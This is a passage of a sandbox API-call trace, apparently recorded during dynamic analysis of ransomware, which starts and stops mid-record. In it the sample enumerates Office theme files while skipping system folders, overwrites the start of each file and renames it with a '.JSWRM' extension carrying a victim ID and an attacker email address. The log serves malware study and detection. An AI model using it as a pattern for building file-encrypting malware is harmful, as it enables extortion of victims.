lpString2="..") returned 0 [0100.132] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110ef705, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110ef705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x11161e0e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb447d, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Facet.thmx", cAlternateFileName="FACET~1.THM")) returned 1 [0100.132] lstrcmpiW (lpString1="Facet.thmx", lpString2=".") returned 1 [0100.132] lstrcmpiW (lpString1="Facet.thmx", lpString2="..") returned 1 [0100.132] lstrcmpiW (lpString1="Facet.thmx", lpString2="...") returned 1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="windows") returned -1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="recovery") returned -1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="perflogs") returned -1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="documents and settings") returned 1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="system volume information") returned -1 [0100.133] lstrcmpiW (lpString1="Facet.thmx", lpString2="msocache") returned -1 [0100.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Facet.thmx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Facet.thmx", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Facet.thmx", lpUsedDefaultChar=0x0) returned 10 [0100.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0100.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Facet.thmx", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Facet.thmx", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Facet.thmx", lpUsedDefaultChar=0x0) returned 10 [0100.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0100.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0100.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225328 | out: hHeap=0x1e0000) returned 1 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.133] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0100.133] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Facet.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\facet.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.133] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=738429) returned 1 [0100.134] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.134] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.149] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.149] CloseHandle (hObject=0x45c) returned 1 [0100.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0100.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0100.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0100.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0100.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.150] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Facet.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\facet.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Facet.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\facet.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0100.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0100.150] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110ef705, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110ef705, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3495ac, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Integral.thmx", cAlternateFileName="INTEGR~1.THM")) returned 1 [0100.150] lstrcmpiW (lpString1="Integral.thmx", lpString2=".") returned 1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="..") returned 1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="...") returned 1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="windows") returned -1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="recovery") returned -1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="perflogs") returned -1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="documents and settings") returned 1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="system volume information") returned -1 [0100.151] lstrcmpiW (lpString1="Integral.thmx", lpString2="msocache") returned -1 [0100.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integral.thmx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integral.thmx", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Integral.thmx", lpUsedDefaultChar=0x0) returned 13 [0100.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integral.thmx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Integral.thmx", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Integral.thmx", lpUsedDefaultChar=0x0) returned 13 [0100.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0100.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0100.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Integral.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\integral.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.152] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=3446188) returned 1 [0100.152] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.152] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.167] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.167] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.167] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.167] CloseHandle (hObject=0x45c) returned 1 [0100.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0100.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.170] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.170] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0100.171] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0100.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0100.171] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.171] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Integral.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\integral.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Integral.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\integral.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0100.171] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0100.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0100.172] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x11161e0e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x11161e0e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1132ba98, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1855eb, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Ion Boardroom.thmx", cAlternateFileName="IONBOA~1.THM")) returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2=".") returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="..") returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="...") returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="windows") returned -1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="recovery") returned -1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="perflogs") returned -1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="documents and settings") returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="system volume information") returned -1 [0100.172] lstrcmpiW (lpString1="Ion Boardroom.thmx", lpString2="msocache") returned -1 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion Boardroom.thmx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion Boardroom.thmx", cchWideChar=18, lpMultiByteStr=0x241010, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ion Boardroom.thmx", lpUsedDefaultChar=0x0) returned 18 [0100.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion Boardroom.thmx", cchWideChar=18, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion Boardroom.thmx", cchWideChar=18, lpMultiByteStr=0x2410d8, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ion Boardroom.thmx", lpUsedDefaultChar=0x0) returned 18 [0100.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0100.172] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.172] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.172] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0100.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion Boardroom.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion boardroom.thmx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0100.173] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=1594859) returned 1 [0100.173] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.173] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d210 [0100.173] ReadFile (in: hFile=0x45c, lpBuffer=0x24d210, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345ec04*=0x27100, lpOverlapped=0x0) returned 1 [0100.187] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.187] WriteFile (in: hFile=0x45c, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345ec00*=0x27100, lpOverlapped=0x0) returned 1 [0100.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.188] CloseHandle (hObject=0x45c) returned 1 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0100.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0100.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0100.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e228 [0100.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.189] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion Boardroom.thmx" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion boardroom.thmx"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Document Themes 16\\Ion Boardroom.thmx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\document themes 16\\ion boardroom.thmx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e228 | out: hHeap=0x1e0000) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0100.189] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0100.189] FindNextFileW (in: hFindFile=0x231d00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1118806a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1118806a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x111ae2aa, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1c09db, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="Ion.thmx", cAlternateFileName="ION~1.THM")) returned 1 [0100.189] lstrcmpiW (lpString1="Ion.thmx", lpString2=".") returned 1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="..") returned 1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="...") returned 1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="windows") returned -1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="recovery") returned -1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="perflogs") returned -1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="documents and settings") returned 1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="$RECYCLE.BIN") returned 1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="system volume information") returned -1 [0100.190] lstrcmpiW (lpString1="Ion.thmx", lpString2="msocache") returned -1 [0100.190] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion.thmx", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0100.190] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ion.thmx", 